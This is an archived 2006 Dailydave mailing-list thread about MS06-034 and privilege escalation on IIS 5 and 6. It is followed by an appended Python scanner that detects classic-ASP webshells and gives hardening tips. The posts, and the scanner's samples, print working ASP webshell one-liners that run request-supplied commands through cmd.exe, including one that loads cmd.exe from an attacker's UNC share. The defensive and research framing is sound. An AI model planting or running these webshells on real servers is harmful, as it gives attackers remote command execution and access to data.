Dailydave mailing list archives
Re: MS06-034 lies? IIS 6 can still be owned?
From: Cesar <sqlsec () yahoo com>
Date: Wed, 26 Jul 2006 06:50:08 -0700 (PDT)
Some corrections: I forgot to mention that for the remote ASP shell you will need permissions on cmd.exe, because by default it can't be accessed, but you can use the following (or other tricks available):

<%=server.createobject("wscript.shell").exec(Server.MapPath("youruploadedCmd.exe") & " /c " & request("cmd")).stdout.readall %>

Also it's not necessary to upload a binary to the server, since you can:

<%=server.createobject("wscript.shell").exec("\\attackerip\share\cmd.exe" & " /c " & request("cmd")).stdout.readall %>

Thanks a lot to Brett for pointing out the cmd.exe permissions issue.

Cesar.

--- Cesar <sqlsec () yahoo com> wrote:
MS06-034 lies? IIS 6 can still be owned?

Hi all.

After early getting the details of MS06-034 I thought it would be cool to build the exploits, since there has been a long time without any IIS exploit and our customers (see *1) will like it, so I asked the guys to build the exploits and said that I would take care of the part of elevating privileges, since I had some theory that there was a way to elevate privileges. What was funny is that some time later I realized that if you can upload an ASP page then it's pretty simple to have a remote shell running under the same account that the exploits would run:

-----shell.asp (got this from xfocus.org)------
<%=server.createobject("wscript.shell").exec("cmd.exe /c " & request("command")).stdout.readall%>
-------------------------------------------

So I wonder why MS patched the vulnerability if it's pretty simple to have a remote shell on default configurations? Maybe because wscript.shell can be disabled, removed, etc., or you can't run or upload .exe on the server; in these cases the exploit will be handy.

Also MS stated:

-----------------------------
on Mitigating Factors
....
On IIS 5.0 and IIS 5.1, ASP enabled applications by default run in the 'Pooled Out of Process' application, which means they run in DLLHOST.exe, which is running in the context of the low privilege IWAM_<machinename> account. By default, ASP is not enabled on IIS 6.0. If ASP is enabled, it runs in the context of a W3WP.exe worker process running as the low privilege 'NetworkService' account.

on FAQ Workarounds...
-What might an attacker use the vulnerability to do?
An attacker who successfully exploited this vulnerability could take complete control of the affected system.
----------------------

That's pretty confusing, since they are saying IIS 5 & 6 run under low privileged accounts and then they say an attacker could take complete control...???

My theory on the elevation of privileges was in part wrong, but I could elevate privileges, so now the exploits can also give you a remote shell under an administrative account, which I think is why MS patched the vulnerability. While MS fixed the ASP vulnerability they didn't fix a design flaw that allows elevating privileges if you can run code under the IIS 5 & 6 low privileged accounts :)

So now we will have available for our customers: iisroot.exe, which if run from an ASP (.NET also) web page on default settings can own IIS 6 (and the server of course).

Cesar.

(*1 http://www.argeniss.com/products.html)

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
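The three one-liners in this thread (cmd.exe called directly, an uploaded copy of cmd.exe resolved with Server.MapPath, and a binary pulled from a UNC share) are exactly what a responder hunts for in an IIS web root. The scanner below is an added example, not code from the thread or from Argeniss: a heuristic static check for classic-ASP command shells. The indicator names, the verdict thresholds and the sample pages are my own; the three "shell" samples mirror the one-liners quoted above, the two others are constructed for contrast.

```python
"""Heuristic scanner for classic-ASP command shells (added example).

Scans each <% ... %> server-side block for the building blocks the thread's
one-liners share: WScript.Shell creation, an Exec/Run call, an argument taken
from the Request collection, a "/c" handed to cmd, a UNC-path executable, and
Server.MapPath used to reach an uploaded binary.
"""
import re
from dataclasses import dataclass

# ASP/VBScript is case-insensitive, so every pattern is compiled with re.I.
# Blocks are matched as a whole, so a call wrapped across lines still hits.
INDICATORS = {
    "creates WScript.Shell":
        re.compile(r'createobject\s*\(\s*"wscript\.shell"\s*\)', re.I),
    "calls Exec/Run":
        re.compile(r'\.\s*(exec|run)\s*\(', re.I),
    "argument comes from Request":
        re.compile(r'\brequest\s*(\.\s*\w+)?\s*\(', re.I),
    "passes /c to cmd":
        re.compile(r'\bcmd(\.exe)?\b[^a-z]{0,20}/c\b', re.I),
    "executable on a UNC share":
        re.compile(r'\\\\[\w.-]+\\[^"\s]*?\.exe\b', re.I),
    "resolves a file under the web root":
        re.compile(r'server\s*\.\s*mappath\s*\(', re.I),
}
_CODE_BLOCK = re.compile(r'<%(.*?)%>', re.S)
_SPAWN = {"creates WScript.Shell", "calls Exec/Run",
          "passes /c to cmd", "executable on a UNC share"}


@dataclass(frozen=True)
class Finding:
    block: int          # index of the <% ... %> block within the page
    indicators: tuple   # matched indicator names, in INDICATORS order
    verdict: str        # "webshell" or "suspicious" (clean blocks are dropped)


def _verdict(hits):
    # Attacker-controlled input reaching a spawned process is the real shell.
    if {"creates WScript.Shell", "calls Exec/Run",
        "argument comes from Request"} <= hits:
        return "webshell"
    # Process creation with no visible user input still deserves a look.
    if hits & _SPAWN:
        return "suspicious"
    return "clean"


def scan_asp(page):
    """Return a Finding for every server-side block that is not clean."""
    blocks = _CODE_BLOCK.findall(page) or [page]   # no tags: treat whole text as code
    findings = []
    for index, code in enumerate(blocks):
        hits = tuple(name for name, rx in INDICATORS.items() if rx.search(code))
        verdict = _verdict(set(hits))
        if verdict != "clean":
            findings.append(Finding(index, hits, verdict))
    return findings


def classify(page):
    """Worst verdict over the whole page: webshell > suspicious > clean."""
    rank = {"clean": 0, "suspicious": 1, "webshell": 2}
    return max((f.verdict for f in scan_asp(page)), key=rank.get, default="clean")


# Constructed sample pages. The first three mirror the thread's one-liners;
# hello.asp and uptime.asp are made up to show a clean and a borderline page.
SAMPLES = {
    "shell.asp": '<%=server.createobject("wscript.shell").exec("cmd.exe /c " '
                 '& request("command")).stdout.readall%>',
    "upload.asp": '<%=server.createobject("wscript.shell").exec('
                  'Server.MapPath("youruploadedCmd.exe") & " /c " & request("cmd"))'
                  '.stdout.readall %>',
    "unc.asp": '<%=server.createobject("wscript.shell").exec('
               '"\\\\attackerip\\share\\cmd.exe" & " /c " & request("cmd"))'
               '.stdout.readall %>',
    "hello.asp": '<html><body><% Response.Write("Hello, " & '
                 'Server.HTMLEncode(Request("name"))) %></body></html>',
    "uptime.asp": '<% Set sh = Server.CreateObject("WScript.Shell")\n'
                  'Response.Write sh.Exec("cmd.exe /c net statistics server")'
                  '.StdOut.ReadAll %>',
}

if __name__ == "__main__":
    for name, page in SAMPLES.items():
        print(f"{name:12s} {classify(page):10s}",
              [f.indicators for f in scan_asp(page)])
```

Run it against a copy of the web root (iterate the .asp/.asa/.aspx files and feed each to classify) rather than on the live server from an IIS account. It is a first-pass triage tool only: a shell that builds "wscript.shell" with Chr() or Eval, or that names the executable anything other than *.exe, slips past these regexes, so treat a "suspicious" verdict as a prompt to read the file, not as a clean bill. On the host itself the mitigations the thread mentions are the ones worth verifying: the ACL on cmd.exe for NETWORK SERVICE and the IWAM_ account, and whether the WScript.Shell COM class is still registered.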
Current thread:
- MS06-034 lies? IIS 6 can still be owned? Cesar (Jul 25)
- Re: MS06-034 lies? IIS 6 can still be owned? Cesar (Jul 26)